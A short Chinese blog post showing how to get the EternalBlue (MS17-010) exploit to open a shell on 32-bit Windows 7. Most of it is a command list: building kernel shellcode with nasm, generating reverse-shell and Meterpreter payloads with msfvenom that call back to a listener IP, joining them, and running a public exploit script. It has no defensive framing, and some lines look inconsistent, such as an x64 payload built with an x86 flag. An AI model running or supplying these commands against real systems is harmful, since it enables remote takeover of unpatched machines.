0%

MS17-010 X86 上线

简介:

  • ms17-010

    1
    x86 明明存在但是不能上线

环境介绍:

系统版本: 系统x86 windows7sp1

测试: kali2020

x86系统:

平时测试时候遇到x86不能正常上线

于是找到文章基于python的利用工具

link:https://github.com/worawit/MS17-010

你是否见过这样的

1.png

但是现实是这样的

2.png

如何解决这个问题呢?

1
2
3
4
5
6
7
8
9
10
11
12
13
•  nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
• nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
• msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.230.130 --platform windows -a x86 --format raw -o sc_x86_payload.bin
• cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
cd shellcode/
• msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.230.130 --platform windows -a x64 --format raw -o sc_x64_payload.bin
• msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=192.168.230.130 -- platform windows -a x86 --format raw -o sc_x86_payload.bin
• msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.230.130 --platform windows -a x86 --format raw -o sc_meterpreter_x86_payload.bin
• cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
• cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
• cat sc_x86_kernel.bin sc_meterpreter_x86_payload.bin > sc_meterpreter_x86.bin
• python eternalblue_exploit7.py 192.168.230.130 shellcode/sc_meterpreter_x86.bin

好了,上线

3.jpg

4.png

参考链接:

https://youtube.com
https://baidu.com
https://www.digitalmunition.me/exploit-eternalblue-ms17-010-vulnerability-bypass-av/
https://github.com/worawit/MS17-010